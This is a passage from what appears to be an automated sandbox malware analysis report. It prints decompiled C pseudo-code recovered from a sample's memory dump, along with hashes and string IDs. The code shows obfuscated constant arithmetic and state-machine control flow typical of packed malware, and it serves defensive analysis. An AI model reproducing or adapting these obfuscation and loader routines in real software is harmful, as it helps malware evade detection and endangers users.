                                          				_v24 = _v24 ^ 0x75854120;
                                          				_v32 = 0x424b;
                                          				_v32 = _v32 ^ 0x8f16dfbf;
                                          				_v32 = _v32 << 0xc;
                                          				_v32 = _v32 + 0xffffa50c;
                                          				_v32 = _v32 ^ 0x69defe02;
                                          				_v8 = 0x6622;
                                          				_t188 = 0x62;
                                          				_v8 = _v8 / _t188;
                                          				_v8 = _v8 ^ 0x00007651;
                                          				_v36 = 0x9705;
                                          				_t189 = 0x5a;
                                          				_v36 = _v36 * 0x11;
                                          				_v36 = _v36 / _t189;
                                          				_v36 = _v36 | 0xcd876993;
                                          				_v36 = _v36 ^ 0xcd872ff9;
                                          				_v40 = 0x44cf;
                                          				_v40 = _v40 | 0x3f74ab7e;
                                          				_v40 = _v40 << 1;
                                          				_v40 = _v40 + 0x396f;
                                          				_v40 = _v40 ^ 0x7eea1d0a;
                                          				_v4 = E006D8C8F(_t189);
                                          				_t217 = _v28 + E006D8C8F(_t189) % _v52;
                                          				_t184 = _v20 + E006D8C8F(_v52) % _v44;
                                          				if(_t217 != 0) {
                                          					_t211 = _t215;
                                          					_t194 = _t217 >> 1;
                                          					_t215 = _t215 + _t217 * 2;
                                          					_t181 = memset(_t211, 0x2d002d, _t194 << 2);
                                          					asm("adc ecx, ecx");
                                          					memset(_t211 + _t194, _t181, 0);
                                          				}
                                          				E006CD6C9(_v8, _t215, 3, _t184, _v36,  &_v4, _v40);
                                          				 *((short*)(_t215 + _t184 * 2)) = 0;
                                          				return 0;
                                          			}
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: BQ{*$H'$KB$Qv$o9
                                          • API String ID: 0-3657823386
                                          • Opcode ID: cc563c4f974bf484883b2de3c1cdd218fb05770f9d62957089e07ad233a0ec37
                                          • Instruction ID: cd6ea57da9794710d02a4a6eb7a53f8c764d8c6721ebde7b852f90b9a738d577
                                          • Opcode Fuzzy Hash: cc563c4f974bf484883b2de3c1cdd218fb05770f9d62957089e07ad233a0ec37
                                          • Instruction Fuzzy Hash: A36102715093419FD388CF25D58A50BBBE1FBC8748F408A1DF1DA96260D7B9DA098F8A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 96%
                                          			E006C5B79(intOrPtr __ecx, intOrPtr* __edx) {
                                          				intOrPtr _v4;
                                          				intOrPtr _v8;
                                          				intOrPtr _v12;
                                          				intOrPtr _v16;
                                          				intOrPtr* _v20;
                                          				intOrPtr _v24;
                                          				char _v28;
                                          				intOrPtr _v32;
                                          				intOrPtr _v36;
                                          				intOrPtr _v40;
                                          				signed int _v44;
                                          				signed int _v48;
                                          				signed int _v52;
                                          				signed int _v56;
                                          				signed int _v60;
                                          				signed int _v64;
                                          				signed int _v68;
                                          				signed int _v72;
                                          				signed int _v76;
                                          				signed int _v80;
                                          				signed int _v84;
                                          				signed int _v88;
                                          				signed int _v92;
                                          				signed int _v96;
                                          				unsigned int _v100;
                                          				signed int _v104;
                                          				signed int _v108;
                                          				signed int _v112;
                                          				signed int _v116;
                                          				intOrPtr* _t203;
                                          				intOrPtr _t214;
                                          				intOrPtr _t215;
                                          				intOrPtr _t216;
                                          				intOrPtr _t220;
                                          				intOrPtr _t224;
                                          				void* _t243;
                                          				intOrPtr _t244;
                                          				intOrPtr _t245;
                                          				signed int _t246;
                                          				signed int _t247;
                                          				signed int _t248;
                                          				signed int _t249;
                                          				intOrPtr _t250;
                                          				intOrPtr _t252;
                                          				signed int* _t253;
                                          
                                          				_t215 = __ecx;
                                          				_t253 =  &_v116;
                                          				_v20 = __edx;
                                          				_v32 = __ecx;
                                          				_v12 = 0xafae1;
                                          				_v4 = 0;
                                          				_v8 = 0x46e7c7;
                                          				_v100 = 0x4e85;
                                          				_v100 = _v100 >> 4;
                                          				_v100 = _v100 + 0xa122;
                                          				_v100 = _v100 ^ 0x0000ef7f;
                                          				_v76 = 0x276c;
                                          				_v76 = _v76 + 0xa4ad;
                                          				_v76 = _v76 ^ 0x0000a5d4;
                                          				_v116 = 0xc292;
                                          				_v36 = 0;
                                          				_v116 = _v116 * 0x3d;
                                          				_t243 = 0x5ac7f3d;
                                          				_v116 = _v116 << 0xc;
                                          				_t246 = 0x1a;
                                          				_v116 = _v116 / _t246;
                                          				_v116 = _v116 ^ 0x08d6c610;
                                          				_v96 = 0x57a;
                                          				_v96 = _v96 << 4;
                                          				_v96 = _v96 + 0xde71;
                                          				_v96 = _v96 ^ 0x000109c0;
                                          				_v108 = 0xf9e9;
                                          				_v108 = _v108 >> 0xe;
                                          				_v108 = _v108 + 0xffffa4d5;
                                          				_t247 = 0x1e;
                                          				_v108 = _v108 * 0x3c;
                                          				_v108 = _v108 ^ 0xffeac835;
                                          				_v112 = 0x3502;
                                          				_v112 = _v112 >> 0xc;
                                          				_v112 = _v112 + 0xffffe509;
                                          				_v112 = _v112 >> 0xe;
                                          				_v112 = _v112 ^ 0x0003f015;
                                          				_v64 = 0x4162;
                                          				_v64 = _v64 + 0xffff06ec;
                                          				_v64 = _v64 ^ 0xffff0d41;
                                          				_v68 = 0x29f6;
                                          				_v68 = _v68 | 0xa40114db;
                                          				_v68 = _v68 ^ 0xa4015458;
                                          				_v72 = 0x8ebc;
                                          				_v72 = _v72 | 0xb773f5bd;
                                          				_v72 = _v72 ^ 0xb773df20;
                                          				_v52 = 0x199c;
                                          				_v52 = _v52 + 0x59c9;
                                          				_v52 = _v52 ^ 0x00005d96;
                                          				_v56 = 0x9de2;
                                          				_v56 = _v56 | 0x18b104fc;
                                          				_v56 = _v56 ^ 0x18b18c09;
                                          				_v60 = 0xcf04;
                                          				_v60 = _v60 >> 0xd;
                                          				_v60 = _v60 ^ 0x0000237a;
                                          				_v92 = 0x847f;
                                          				_v92 = _v92 / _t247;
                                          				_v92 = _v92 + 0xfffff45a;
                                          				_v92 = _v92 ^ 0xffffeb4a;
                                          				_v104 = 0x72c3;
                                          				_v104 = _v104 * 0x70;
                                          				_v104 = _v104 >> 0xa;
                                          				_v104 = _v104 + 0xffffb2c0;
                                          				_v104 = _v104 ^ 0xffff9126;
                                          				_v48 = 0x26a;
                                          				_t248 = 0x5f;
                                          				_v48 = _v48 / _t248;
                                          				_v48 = _v48 ^ 0x00002d62;
                                          				_v88 = 0x3bd5;
                                          				_v88 = _v88 | 0xeefd350a;
                                          				_v88 = _v88 >> 1;
                                          				_v88 = _v88 ^ 0x777ec4bd;
                                          				_v44 = 0x124c;
                                          				_v44 = _v44 + 0xffff1b1d;
                                          				_v44 = _v44 ^ 0xffff4aeb;
                                          				_v80 = 0x5ade;
                                          				_t249 = 0x3c;
                                          				_t252 = _v20;
                                          				_t214 = _v20;
                                          				_v80 = _v80 * 0x3a;
                                          				_v80 = _v80 + 0xffff943f;
                                          				_v80 = _v80 ^ 0x0014640e;
                                          				_v84 = 0x6f1d;
                                          				_t250 = _v16;
                                          				_v84 = _v84 / _t249;
                                          				_v84 = _v84 * 0x74;
                                          				_v84 = _v84 ^ 0x0000fa63;
                                          				_t199 = _v40;
                                          				while(_t243 != 0x5ac7f3d) {
                                          					if(_t243 == 0x17993a65) {
                                          						_t216 = E006D023A(_t215, _v96, _v108, _t199, _v112, _t252,  &_v28);
                                          						_t253 =  &(_t253[5]);
                                          						_v36 = _t216;
                                          						if(_t216 == 0) {
                                          							_t244 = _v36;
                                          							goto L19;
                                          						} else {
                                          							_t220 = _v28;
                                          							if(_t220 == 0) {
                                          								goto L15;
                                          							} else {
                                          								_t199 = _v40 + _t220;
                                          								_v40 = _v40 + _t220;
                                          								_t252 = _t252 - _t220;
                                          								if(_t252 != 0) {
                                          									goto L6;
                                          								} else {
                                          									_t224 = _t250 + _t250;
                                          									_push(_t224);
                                          									_push(_t224);
                                          									_v24 = _t224;
                                          									_t245 = E006C8736(_t224);
                                          									if(_t245 == 0) {
                                          										goto L15;
                                          									} else {
                                          										E006D2674(_v52, _v56, _t250, _t245, _v60, _v92, _t214);
                                          										E006CF536(_v104, _v48, _v88, _t214);
                                          										_t252 = _t250;
                                          										_t199 = _t245 + _t250;
                                          										_t250 = _v24;
                                          										_t253 =  &(_t253[7]);
                                          										_v40 = _t199;
                                          										_t214 = _t245;
                                          										if(_t252 == 0) {
                                          											goto L15;
                                          										} else {
                                          											goto L6;
                                          										}
                                          									}
                                          								}
                                          							}
                                          						}
                                          					} else {
                                          						if(_t243 != 0x1ebe7f62) {
                                          							L14:
                                          							if(_t243 != 0x20fb0f57) {
                                          								continue;
                                          							} else {
                                          								goto L15;
                                          							}
                                          						} else {
                                          							_t250 = 0x10000;
                                          							_push(_t215);
                                          							_push(_t215);
                                          							_t199 = E006C8736(0x10000);
                                          							_t214 = _t199;
                                          							if(_t214 == 0) {
                                          								L15:
                                          								_t244 = _v36;
                                          								if(_t244 == 0) {
                                          									L19:
                                          									E006CF536(_v44, _v80, _v84, _t214);
                                          								} else {
                                          									_t203 = _v20;
                                          									 *_t203 = _t214;
                                          									 *((intOrPtr*)(_t203 + 4)) = _t250 - _t252;
                                          								}
                                          							} else {
                                          								_v40 = _t199;
                                          								_t252 = 0x10000;
                                          								L6:
                                          								_t215 = _v32;
                                          								_t243 = 0x17993a65;
                                          								continue;
                                          							}
                                          						}
                                          					}
                                          					return _t244;
                                          				}
                                          				_t243 = 0x1ebe7f62;
                                          				goto L14;
                                          			}

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: b-$bA$l'$z#
                                          • API String ID: 0-3285866504
                                          • Opcode ID: d6ffba5fd41fe7544c9f0c197747c63bcf5a9ecd6bc5aaba3b06836ed62c8ea0
                                          • Instruction ID: 1a35066992cb1f29e9cdf66b40c0185afab7dc04922a19557ba2ca3d3d02d476
                                          • Opcode Fuzzy Hash: d6ffba5fd41fe7544c9f0c197747c63bcf5a9ecd6bc5aaba3b06836ed62c8ea0
                                          • Instruction Fuzzy Hash: E4A120B15087819FD368CF69C88991FBBE2FBC4718F508A1DF59586260D3B4DA498F82
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 93%
                                          			E006C80BA(intOrPtr* __ecx, void* __edx, intOrPtr _a4, signed int* _a8) {
                                          				char _v76;
                                          				signed int _v80;
                                          				signed int _v84;
                                          				signed int _v88;
                                          				signed int _v92;
                                          				unsigned int _v96;
                                          				signed int _v100;
                                          				signed int _v104;
                                          				signed int _v108;
                                          				signed int _v112;
                                          				signed int _v116;
                                          				signed int _v120;
                                          				signed int _v124;
                                          				void* _t96;
                                          				signed int _t110;
                                          				signed int _t115;
                                          				void* _t118;
                                          				intOrPtr* _t132;
                                          				signed int* _t133;
                                          				signed int* _t136;
                                          
                                          				_t133 = _a8;
                                          				_push(_t133);
                                          				_push(_a4);
                                          				_t132 = __ecx;
                                          				_push(__ecx);
                                          				E006C602B(_t96);
                                          				_v96 = 0xfd71;
                                          				_t136 =  &(( &_v124)[4]);
                                          				_v96 = _v96 >> 3;
                                          				_v96 = _v96 ^ 0x00001ccd;
                                          				_t118 = 0x30cb7a4b;
                                          				_v120 = 0xdf4c;
                                          				_t115 = 3;
                                          				_v120 = _v120 * 0xb;
                                          				_v120 = _v120 << 0xb;
                                          				_v120 = _v120 ^ 0x4cc20427;
                                          				_v100 = 0xc552;
                                          				_v100 = _v100 << 1;
                                          				_v100 = _v100 ^ 0x0001a6ce;
                                          				_v124 = 0x18f9;
                                          				_v124 = _v124 ^ 0xb394f6a4;
                                          				_v124 = _v124 | 0xdedfeaf6;
                                          				_v124 = _v124 ^ 0xffdfdfcb;
                                          				_v104 = 0x111;
                                          				_v104 = _v104 / _t115;
                                          				_v104 = _v104 ^ 0x000052be;
                                          				_v108 = 0x5c9e;
                                          				_v108 = _v108 * 0x3f;
                                          				_v108 = _v108 ^ 0x0016b186;
                                          				_v112 = 0xa32c;
                                          				_v112 = _v112 << 3;
                                          				_v112 = _v112 >> 0xd;
                                          				_v112 = _v112 ^ 0x000047d3;
                                          				_v116 = 0x4558;
                                          				_v116 = _v116 >> 0xb;
                                          				_v116 = _v116 ^ 0x0dcfa8f2;
                                          				_v116 = _v116 ^ 0x0dcf9328;
                                          				_v92 = 0xa46a;
                                          				_v92 = _v92 | 0x10f37349;
                                          				_v92 = _v92 ^ 0x10f3c95f;
                                          				_v80 = 0x75fc;
                                          				_v80 = _v80 | 0x150fa2b7;
                                          				_v80 = _v80 ^ 0x150fb0d6;
                                          				_v84 = 0x120;
                                          				_v84 = _v84 << 6;
                                          				_v84 = _v84 ^ 0x00001616;
                                          				_v88 = 0x286e;
                                          				_v88 = _v88 * 0x36;
                                          				_v88 = _v88 ^ 0x0008f8fa;
                                          				do {
                                          					while(_t118 != 0x75fb138) {
                                          						if(_t118 == 0xe7893d9) {
                                          							E006D360F( &_v76, _v112, _v116,  *_t132, _v92);
                                          							_t136 =  &(_t136[3]);
                                          							_t118 = 0x75fb138;
                                          							continue;
                                          						} else {
                                          							if(_t118 == 0xf76409b) {
                                          								_push(_t118);
                                          								_push(_t118);
                                          								_t110 = E006C8736(_t133[1]);
                                          								 *_t133 = _t110;
                                          								__eflags = _t110;
                                          								if(__eflags != 0) {
                                          									_t118 = 0x11f2e7ae;
                                          									continue;
                                          								}
                                          							} else {
                                          								if(_t118 == 0x11f2e7ae) {
                                          									E006D50F2( &_v76, _v124, _v104, _v108, _t133);
                                          									_t136 =  &(_t136[3]);
                                          									_t118 = 0xe7893d9;
                                          									continue;
                                          								} else {
                                          									if(_t118 == 0x25eae02b) {
                                          										_t133[1] = E006D61B8(_t132);
                                          										_t118 = 0xf76409b;
                                          										continue;
                                          									} else {
                                          										if(_t118 != 0x30cb7a4b) {
                                          											goto L14;
                                          										} else {
                                          											 *_t133 = 0;
                                          											_t118 = 0x25eae02b;
                                          											_t133[1] = 0;
                                          											continue;
                                          										}
                                          									}
                                          								}
                                          							}
                                          						}
                                          						goto L15;
                                          					}
                                          					E006C7998(_v80, _v84, __eflags, _t132 + 4,  &_v76, _v88);
                                          					_t136 =  &(_t136[3]);
                                          					_t118 = 0x2f2a8f34;
                                          					L14:
                                          					__eflags = _t118 - 0x2f2a8f34;
                                          				} while (__eflags != 0);
                                          				L15:
                                          				__eflags =  *_t133;
                                          				_t95 =  *_t133 != 0;
                                          				__eflags = _t95;
                                          				return 0 | _t95;
                                          			}

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: +%$+%$XE$n(
                                          • API String ID: 0-3838449085
                                          • Opcode ID: 3bf08974b850d916c8291a17b5ded16042347c14e7b4492625b9026cc2aeceda
                                          • Instruction ID: 207697ce0d82da4105cab81921b6e0a270cd26ec125e1f7b5913bf174911b15e
                                          • Opcode Fuzzy Hash: 3bf08974b850d916c8291a17b5ded16042347c14e7b4492625b9026cc2aeceda
                                          • Instruction Fuzzy Hash: 305144701097429FC358DF20D88986BBBE2FF94748F505A2DF58697260DBB58A49CF83
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 96%
                                          			E006D8D1C(void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
                                          				signed int _v4;
                                          				signed int _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				signed int _v28;
                                          				signed int _v32;
                                          				signed int _v36;
                                          				void* _t108;
                                          				intOrPtr _t110;
                                          				intOrPtr _t120;
                                          				signed int _t121;
                                          				signed int _t122;
                                          				signed int _t123;
                                          				signed int _t124;
                                          				intOrPtr _t127;
                                          				intOrPtr _t128;
                                          				intOrPtr _t144;
                                          				intOrPtr* _t145;
                                          				void* _t146;
                                          				intOrPtr* _t147;
                                          
                                          				_v36 = 0x4ef4;
                                          				_v36 = _v36 + 0xa860;
                                          				_v36 = _v36 | 0x1c77c6a8;
                                          				_t121 = 0x2a;
                                          				_v36 = _v36 / _t121;
                                          				_v36 = _v36 ^ 0x00adf3e3;
                                          				_v16 = 0xcfa4;
                                          				_v16 = _v16 << 0xe;
                                          				_v16 = _v16 ^ 0x33e94134;
                                          				_v24 = 0x2a39;
                                          				_v24 = _v24 ^ 0x66b190f2;
                                          				_v24 = _v24 + 0x3fe;
                                          				_v24 = _v24 ^ 0x66b19dc3;
                                          				_v12 = 0x275a;
                                          				_v12 = _v12 ^ 0xee83f1bc;
                                          				_v12 = _v12 ^ 0xee83c69b;
                                          				_v20 = 0x82c0;
                                          				_v20 = _v20 | 0x74e44d6f;
                                          				_v20 = _v20 ^ 0xeca8f7fc;
                                          				_v20 = _v20 ^ 0x984c40be;
                                          				_v32 = 0xcbb2;
                                          				_v32 = _v32 ^ 0xf8a1ef7c;
                                          				_t122 = 0x26;
                                          				_v32 = _v32 / _t122;
                                          				_v32 = _v32 ^ 0xc0a4f16a;
                                          				_v32 = _v32 ^ 0xc62e2f9a;
                                          				_v28 = 0xce4d;
                                          				_t123 = 0x68;
                                          				_v28 = _v28 / _t123;
                                          				_t124 = 0xf;
                                          				_v28 = _v28 / _t124;
                                          				_v28 = _v28 ^ 0x15eb9a2e;
                                          				_v28 = _v28 ^ 0x15ebc86f;
                                          				_v4 = 0x1911;
                                          				_v4 = _v4 ^ 0x7b1b0330;
                                          				_v4 = _v4 ^ 0x7b1b2d08;
                                          				_v8 = 0x92f;
                                          				_v8 = _v8 >> 0xb;
                                          				_v8 = _v8 ^ 0x00005602;
                                          				_t108 = E006D85BA(_t124);
                                          				_t144 = _a4;
                                          				_t146 = _t108;
                                          				_v36 = 0x94f3;
                                          				_v36 = _v36 + 0xffff06f8;
                                          				_v36 = _v36 | 0xf59d433d;
                                          				_v36 = _v36 >> 0xe;
                                          				_t148 = _t144 + 0x24;
                                          				_v36 = _v36 ^ 0x0003ffff;
                                          				_t120 = E006CE29C(_v16, _v24, _t144 + 0x24);
                                          				_t110 =  *((intOrPtr*)(_t144 + 8));
                                          				if(_t110 != _v36 && _t110 != _t146) {
                                          					_t127 =  *((intOrPtr*)(_t144 + 0x18));
                                          					if(_t127 != _v36 && _t127 != _t146) {
                                          						_t145 = _a8;
                                          						_t128 =  *_t145;
                                          						if(E006D8D05(_t128, _t120) == 0) {
                                          							_push(_t128);
                                          							_push(_t128);
                                          							_t147 = E006C8736(0x224);
                                          							if(_t147 != 0) {
                                          								_t95 = _t147 + 0xc; // 0xc
                                          								E006C6636(_t95, _v28, _v4, _v8, _t148);
                                          								 *_t147 = _t120;
                                          								 *((intOrPtr*)(_t147 + 0x220)) =  *_t145;
                                          								 *_t145 = _t147;
                                          							}
                                          						}
                                          					}
                                          				}
                                          				return 1;
                                          			}

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: /$4A3$9*$oMt
                                          • API String ID: 0-1186868077
                                          • Opcode ID: 661624ab906ed40de6bb00755b8a4da712f0a88c1636091944c630c3755a9822
                                          • Instruction ID: 393f964b6883458757db7fcd9af56027c940bc6d91a840ef48f5ecc470df2baa
                                          • Opcode Fuzzy Hash: 661624ab906ed40de6bb00755b8a4da712f0a88c1636091944c630c3755a9822
                                          • Instruction Fuzzy Hash: 805156716083429FD358CF26D48A90BFBE2FB98358F204A1DF48597260C7B4DA49CF86
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E006C2A30(intOrPtr _a4) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				signed int _v28;
                                          				signed int _v32;
                                          				signed int _v36;
                                          				signed int _v40;
                                          				signed int _v44;
                                          				signed int _v48;
                                          				char _v52;
                                          				intOrPtr _v56;
                                          				char _v60;
                                          				char _v124;
                                          				void* _t120;
                                          				signed int _t130;
                                          				signed int _t131;
                                          				signed int _t132;
                                          				intOrPtr _t146;
                                          
                                          				_v12 = 0xa0d7;
                                          				_v12 = _v12 + 0x7eb;
                                          				_v12 = _v12 + 0xffff9690;
                                          				_t130 = 0x70;
                                          				_v12 = _v12 / _t130;
                                          				_v12 = _v12 ^ 0x00005cb7;
                                          				_v36 = 0xa6e2;
                                          				_t131 = 0x7c;
                                          				_t146 = _a4;
                                          				_v36 = _v36 * 0x6c;
                                          				_v36 = _v36 ^ 0x00462f2b;
                                          				_v20 = 0xf5ce;
                                          				_v20 = _v20 + 0xec5e;
                                          				_v20 = _v20 | 0x882d1c6f;
                                          				_v20 = _v20 ^ 0x882decee;
                                          				_v8 = 0xef73;
                                          				_v8 = _v8 * 0x50;
                                          				_v8 = _v8 ^ 0x984778b6;
                                          				_v8 = _v8 | 0x0acb781a;
                                          				_v8 = _v8 ^ 0x9acfaccf;
                                          				_v16 = 0xf20c;
                                          				_t132 = 0x6d;
                                          				_v16 = _v16 / _t131;
                                          				_v16 = _v16 | 0x2a1cc570;
                                          				_v16 = _v16 * 0x5c;
                                          				_v16 = _v16 ^ 0x225769f1;
                                          				_v28 = 0xd318;
                                          				_v28 = _v28 / _t132;
                                          				_v28 = _v28 ^ 0x955bcf9a;
                                          				_v28 = _v28 ^ 0x955bcc47;
                                          				_v40 = 0xc2b8;
                                          				_v40 = _v40 + 0x609d;
                                          				_v40 = _v40 ^ 0x00014342;
                                          				_v24 = 0x21cc;
                                          				_v24 = _v24 << 5;
                                          				_v24 = _v24 << 0xa;
                                          				_v24 = _v24 ^ 0x10e64576;
                                          				_v48 = 0xc8ed;
                                          				_v48 = _v48 + 0xffffe729;
                                          				_v48 = _v48 ^ 0x00009812;
                                          				_v32 = 0xdf82;
                                          				_v32 = _v32 ^ 0xa0cf88d1;
                                          				_v32 = _v32 >> 4;
                                          				_v32 = _v32 ^ 0x0a0ce5c9;
                                          				_v44 = 0xf2d1;
                                          				_v44 = _v44 + 0x3831;
                                          				_v44 = _v44 ^ 0x00011e20;
                                          				_t120 =  *((intOrPtr*)(_t146 + 4))( *((intOrPtr*)(_t146 + 0x28)), 1, 0);
                                          				_t149 = _t120;
                                          				if(_t120 != 0) {
                                          					E006D2349(_v12, _v36, _v20, _v8, _t132);
                                          					_v60 =  &_v124;
                                          					_v56 = E006CF85D(_v16, _t149,  &_v52, _v28, _v40, _v24);
                                          					 *((intOrPtr*)(_t146 + 4))( *((intOrPtr*)(_t146 + 0x28)), 0xa,  &_v60,  &_v124);
                                          					E006D2025(_v48, _v56, _v32, _v44);
                                          				}
                                          				return 0;
                                          			}

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: +/F$18$^$s
                                          • API String ID: 0-1171060364
                                          • Opcode ID: 70d39a78e3ab786549318ccb702bdfc1bcc7dde35113822f4650e37c684f7d3d
                                          • Instruction ID: 1822be48766ab5af6caaffe543bf94afc69ae410598fb25b4e02043e5daffdb3
                                          • Opcode Fuzzy Hash: 70d39a78e3ab786549318ccb702bdfc1bcc7dde35113822f4650e37c684f7d3d
                                          • Instruction Fuzzy Hash: 7451C472D0130AABEF08CFE1C94A9DEBBB6FB04314F208159D511B62A0D7B95A45DF94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 96%
                                          			E006D73AC() {
                                          				intOrPtr _v8;
                                          				intOrPtr _v12;
                                          				signed int _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				char _v28;
                                          				char _v32;
                                          				char _v36;
                                          				signed int _v40;
                                          				signed int _v44;
                                          				signed int _v48;
                                          				signed int _v52;
                                          				signed int _v56;
                                          				signed int _v60;
                                          				signed int _v64;
                                          				signed int _v68;
                                          				signed int _v72;
                                          				signed int _v76;
                                          				signed int _v80;
                                          				signed int _v84;
                                          				signed int _v88;
                                          				signed int _v92;
                                          				signed int _v96;
                                          				signed int _v100;
                                          				signed int _v104;
                                          				signed int _v108;
                                          				signed int _t194;
                                          				intOrPtr _t196;
                                          				intOrPtr _t199;
                                          				intOrPtr _t202;
                                          				intOrPtr _t204;
                                          				intOrPtr _t205;
                                          				signed int _t207;
                                          				signed int _t208;
                                          				signed int _t209;
                                          				signed int _t210;
                                          				void* _t238;
                                          				char _t242;
                                          				signed int* _t243;
                                          				void* _t245;
                                          
                                          				_t243 =  &_v108;
                                          				_v24 = 0x44d5d8;
                                          				_t205 = 0;
                                          				_v20 = 0;
                                          				_v40 = 0x23cf;
                                          				_v40 = _v40 ^ 0xbe38916f;
                                          				_v40 = _v40 ^ 0xbe38820d;
                                          				_v108 = 0x2e00;
                                          				_v108 = _v108 + 0xe6b6;
                                          				_v108 = _v108 * 0x5d;
                                          				_t238 = 0x219f160f;
                                          				_t207 = 0xe;
                                          				_v108 = _v108 / _t207;
                                          				_v108 = _v108 ^ 0x000708e5;
                                          				_v56 = 0xac50;
                                          				_t208 = 0x74;
                                          				_v56 = _v56 / _t208;
                                          				_v56 = _v56 ^ 0x00005612;
                                          				_v48 = 0xf915;
                                          				_v48 = _v48 + 0xc201;
                                          				_v48 = _v48 ^ 0x0001bde6;
                                          				_v76 = 0xa4d1;
                                          				_v76 = _v76 << 0xb;
                                          				_v76 = _v76 + 0x2090;
                                          				_v76 = _v76 ^ 0x0526efdc;
                                          				_v104 = 0x1331;
                                          				_v104 = _v104 ^ 0x9278d736;
                                          				_v104 = _v104 << 0xf;
                                          				_v104 = _v104 << 3;
                                          				_v104 = _v104 ^ 0x101c0c8f;
                                          				_v52 = 0x4912;
                                          				_t209 = 0x53;
                                          				_v52 = _v52 * 0x5f;
                                          				_v52 = _v52 ^ 0x001b11ba;
                                          				_v80 = 0x36f7;
                                          				_v80 = _v80 | 0x0c78674c;
                                          				_v80 = _v80 + 0xffff3df1;
                                          				_v80 = _v80 ^ 0x0c77a943;
                                          				_v84 = 0x9f3a;
                                          				_v84 = _v84 << 8;
                                          				_v84 = _v84 ^ 0x7966a269;
                                          				_v84 = _v84 ^ 0x79f9b7a1;
                                          				_v60 = 0xac57;
                                          				_v60 = _v60 ^ 0x3fa2bf2a;
                                          				_v60 = _v60 ^ 0x3fa276dc;
                                          				_v88 = 0xe218;
                                          				_v88 = _v88 | 0xea5468c5;
                                          				_v88 = _v88 << 0x10;
                                          				_v88 = _v88 ^ 0xeadd1cb3;
                                          				_v64 = 0x6c6b;
                                          				_v64 = _v64 + 0xffff53e7;
                                          				_v64 = _v64 ^ 0xffffd13f;
                                          				_v92 = 0x6a88;
                                          				_v92 = _v92 >> 1;
                                          				_v92 = _v92 ^ 0xe005aace;
                                          				_v92 = _v92 ^ 0xe005a166;
                                          				_v100 = 0xd6b9;
                                          				_v100 = _v100 ^ 0x5f91bbd5;
                                          				_v100 = _v100 ^ 0x5ce69075;
                                          				_v100 = _v100 >> 0xf;
                                          				_v100 = _v100 ^ 0x00003faf;
                                          				_v44 = 0xc8e7;
                                          				_v44 = _v44 / _t209;
                                          				_v44 = _v44 ^ 0x00005627;
                                          				_v72 = 0xdbaa;
                                          				_t210 = 0x49;
                                          				_v72 = _v72 / _t210;
                                          				_v72 = _v72 | 0xff4e0ba5;
                                          				_v72 = _v72 ^ 0xff4e47cb;
                                          				_v68 = 0x962f;
                                          				_v68 = _v68 >> 0xe;
                                          				_v68 = _v68 << 4;
                                          				_v68 = _v68 ^ 0x00006f62;
                                          				_v96 = 0xef5c;
                                          				_t211 = 0x44;
                                          				_v96 = _v96 * 0x25;
                                          				_v96 = _v96 / _t211;
                                          				_v96 = _v96 << 1;
                                          				_v96 = _v96 ^ 0x0001262b;
                                          				_t237 = _v36;
                                          				_t242 = _v36;
                                          				goto L1;
                                          				do {
                                          					while(1) {
                                          						L1:
                                          						_t245 = _t238 - 0x219f160f;
                                          						if(_t245 > 0) {
                                          							break;
                                          						}
                                          						if(_t245 == 0) {
                                          							_t238 = 0x2394b362;
                                          							continue;
                                          						}
                                          						if(_t238 == 0x8b9146f) {
                                          							E006D9465(_v68, _t237, _v96);
                                          							L23:
                                          							return _t205;
                                          						}
                                          						if(_t238 == 0x93670d9) {
                                          							_t194 = E006D340A(_v80,  &_v32, _v84,  &_v16);
                                          							asm("sbb esi, esi");
                                          							_pop(_t211);
                                          							_t238 = ( ~_t194 & 0xf6f92468) + 0x24090f6a;
                                          							continue;
                                          						}
                                          						if(_t238 == 0x155b4458) {
                                          							_t196 = E006D89D3(_t242, _v108,  &_v36, _v56);
                                          							_t237 = _t196;
                                          							_pop(_t211);
